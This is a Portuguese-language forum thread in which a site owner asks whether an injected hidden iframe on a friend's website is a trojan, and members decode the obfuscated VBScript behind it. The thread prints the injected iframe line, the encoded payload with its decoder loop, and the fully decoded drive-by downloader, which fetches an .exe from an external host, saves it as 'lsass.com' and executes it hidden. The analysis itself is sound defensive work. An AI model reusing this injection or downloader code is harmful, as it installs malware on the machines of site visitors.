Ir para o conteúdo
LuBoc

Será este código um Trojan?

Mensagens Recomendadas

LuBoc    1
LuBoc

Olá a todos(as),

Queria saber se podem dar algumas luzes sobre esta situação:

Há uns dias um amigo, para o qual fiz um site simples, disse-me que o tamanho das letras estavam alteradas! Como estranhei, e isso só poderia acontecer se mexessem no código, e não colocassem tags CSS que usei para a formatação do texto.

Fui ver o código e apareceu isto no código:

<body>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>

Claro que o <iframe>....</iframe> não deveria estar e fui ver o conteúdo dessa página, e tinha isto:

f_trojanmorgam_a52abb5.png

Alguém sabe do que se trata ? Será um trojan ou algo similar ?

O site não tinha ficheiros com atributos que permitissem a escrita externa, como poderá ter acedido aos ficheiros para fazer as alterações?!!!

Cumprimentos,

LuBoc

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
magician    2
magician

Bom as boas noticias é que seja o que for só funca em IE porque isso foi escrito em VBScript :cheesygrin:

Não me parece código ofensivo é criar um texto e escreve-lo la pagina, agora aquele #8#3.... é que acho estranho mas também não domino muito vbs.

O teu host não coloca banners ou assim ?

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
vbmaster    5
vbmaster

Bem, ele pega numa string bem marada (d) e faz qualquer coisa num for que corre cada caracter dessas string, agora o quê em particular não sei bem...

Mas o mais engraçado é que todo o script está comentado com o código para comentar em html, mas isso não deve afectar nada se estiver dentro do vbscript.

EDIT: Basicamente, parece-me uma maneira estúpida de escrever o texto que já se encontra na string d, com algumas alterações dependendo do tipo do caracter. Provavelmente fará algum crash no IE, mas trojan não me parece.

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
djthyrax    11
djthyrax

Só olhando para o endereço, aposto que é malware. :cheesygrin:

Anyway, experimenta corre-lo mas, na linha s=s+blahblah, mete s=s+"<br />"+blahblah

E depois posta aqui o conteúdo. :P

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
NuGuN    2
NuGuN

Boas....

Estive a ver, e tenho quase a certeza que o que ai está é o código fonte de encriptado que fará qualquer coisa. Passo a explicar...Como já foi dito pelo vbmaster, começa por ler os caracteres da variável "d" um a um. Em seguida para caracter, faz váreas verificações.

Primeiro - Verifica o código ASCII de cada caracter (a=Asc(:)), e deopis consoante o seu valor for 1, 2, 3 ou 4 vai trocalos por 9, 10, 13 ou 34 respectivamente, onde 9 é equivale a um TAB, 10 new line feed, 13 carriage return e 34 correspode a " (aspas). Logo aqui começa a aparecer qualquer coisa....  Estes caracteres na string  da variável "d" correspondem aqueles retangulos entre os caracteres, se repararem existem muitos locais onde estao 2 retangulos seguidos, isso corresponde a um ENTER ou seja, o valor 13 e 10 que num texto corresponde a ENTER (plomenos em VB6 e vbscript).

Depois vêm as linhas "if a<= 31 and a>=14 then" ate "else" que sem ter aqui a string não sei mt bem o que fazem, mas suponho que organize os caracteres da string para gerar o código. O melhor mesmo era disponibilizares ess txt para se poder ver qual era mm o código fonte que isso esconde.

Depois vem "if a>=41 and a<=127 then a=a-1" e "if a<127 then s=s+chr((a) else s=s+b" que completao o código.  Agora que analizei estas 2 linhas já estou a ver +/- o código. O que esta aí é nada mais nada menos que as letras posteriores às que deveriam estar. Ou seja, em vez de um "A" esta um "B", etc... Sendo asim e vendo o inicio o código -> "<script language= VBScript........."

Reparem que entre o "=" e o "V" existe um dos tais rectangulos que só tendo acesso ao txt, se pode saber o que é.

E por fim, guarda o código fonte....

Aqui fica uma tabela ASCII para poderem conferir

LuBoc, se colocasses o txt aqui em anexo era porreiro, para vermos qual era mm o código  :D

Cumps

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
pedrotuga    31
pedrotuga

Ehehe... ah grande nugun! Temos hacker!

Vejam só a diferença que faz ser cuidados com tudo... estavam a olhar só para a parte inteligível do código...

Essa tecnica é das mais usadas para apanhar o pessoal mais desprevinido... ofuscar um script.

Ehehe... epa... a microsoft e as suas tecnologias perigosas eheheh.

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
vbmaster    5
vbmaster

Agora estou bué curioso para ver qual é o código que se encontra por trás. :P

Fiz um wget ao site, aqui está o conteúdo:

d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(⎻␌┐°␍┤*␊±/├°┤B┤┤⎽┘␌┴┤° ␍└␉├├┘␊-.#├┘␊;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$≤<$±/D6$P-$(Njdsptpgu/YNMIUUQ-C$├°┤ TT#±$^$(B␊⎻␊␌/T┤⎽°␉┼O#T/┤≥─° > 2├┤⎽7>HFU≤/P─°⎺ 6#- ␊└- G␉└├°;#T°⎺␊' H°┤ ┤°┼─ ␊┘⎽°␍┤⎻⎽≥ ␉⎺␊ ;$ ⎻┴⎽ ␊°├┤┘⎺␉┤┘⎻⎺ ⎺␉┼°±*#2>└├␉├├)'┬$G┬$,(┘⎺␤/G┘└°T≥├┤°┼┘%W%┤┼─ > G/H°┤T─°␍┘␉└G⎻└␊°⎽(3* └$┼─ ±7#I$ G/CvjmeQbui(unq-;#$&pqfo+#│⎽┘┤° ≤/⎽°├─⎻⎺├°C⎻␊≥;#├␉┬°┤⎻±┘└° Y#-3:#␍└⎻4&\$R<%␋°└└/B──└┘␍'&3%R/=#Fyfd,)┴#A#-U$-1=0├|%?=0cpez?=0iunm?=9#     (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#               =0tdsjqu"

s=""
For i=1 To Len(d)
b=Mid(d,i,1)
a=Asc(b)
If a=1 Then a=9
If a=2 Then a=10
If a=3 Then a=13
If a=4 Then a=34
If a<=31 And a>=14 Then
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4)
i=i+2
Else
if a>=41 and a<=127 then a=a-1
if a <127 then s=s+Chr(a) else s=s+b
End If
Next
document.write s

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
NuGuN    2
NuGuN

Boas..

Ora aqui esta ele :)

<script language="VBScript">
on error resume next

dl = "http://usuarios.arnet.com.ar/alvarezluque/flash7.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set x = df.CreateObject("Microsoft.XMLHTTP","")
set S = df.createobject("Adodb.Stream","")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
' Get temp directory and create our destination name
fname1="lsass.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script></body></html>

Agora só falta saber o que faz aquele flash7.exe  :D

Cumps

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
vbmaster    5
vbmaster

Por isto:

fname1="lsass.com"

Parece que é algo que deve introduzir o Sasser no pc. Arrisco-me a dizer que logo a seguir a abrir essa página em IE7 aparecia a famosa mensagem de shutdown :). Mas há várias vulnerabilidades relacionadas com o LSASS, o Sasser é só uma delas.

Mas, wow, essa cena do código encriptado, excelente!

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
NuGuN    2
NuGuN

Boas...

Bem.. se tem alguma coisa a ver com o Sasser não sei, estove a ver o ficheiro, ele mete-se ao arranque com o nome de "mswinsvcr.exe" e encontra-se em c:\windows\system32. Tentei abrir o exe com um debugger e pareceu-me o exe foi compactado ou encriptado ou sei la, sinceramente não percebo muito de debuggers  :-[... A unica coisa que tive de fazer pra ele desaparecer foi fechar o processo, tira-lo do arranque, e apagar o ficheiro, agora se ele alterou alguma configuração do sistema ou algum programa... isso já não sei  :D

Cumps

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
LuBoc    1
LuBoc

Olá,

Obrigado a todos pelas dicas, realmente é um espertalhão.

A ver se o meu amigo consegue falar com os tipos do alojamento e saber como é que o "gajo" acedeu ao conteúdo do site para colocar isso nas páginas!

Cumprimentos,

LuBoc

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!

Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.

Entrar Agora


×

Aviso Sobre Cookies

Ao usar este site você aceita os nossos Termos de Uso e Política de Privacidade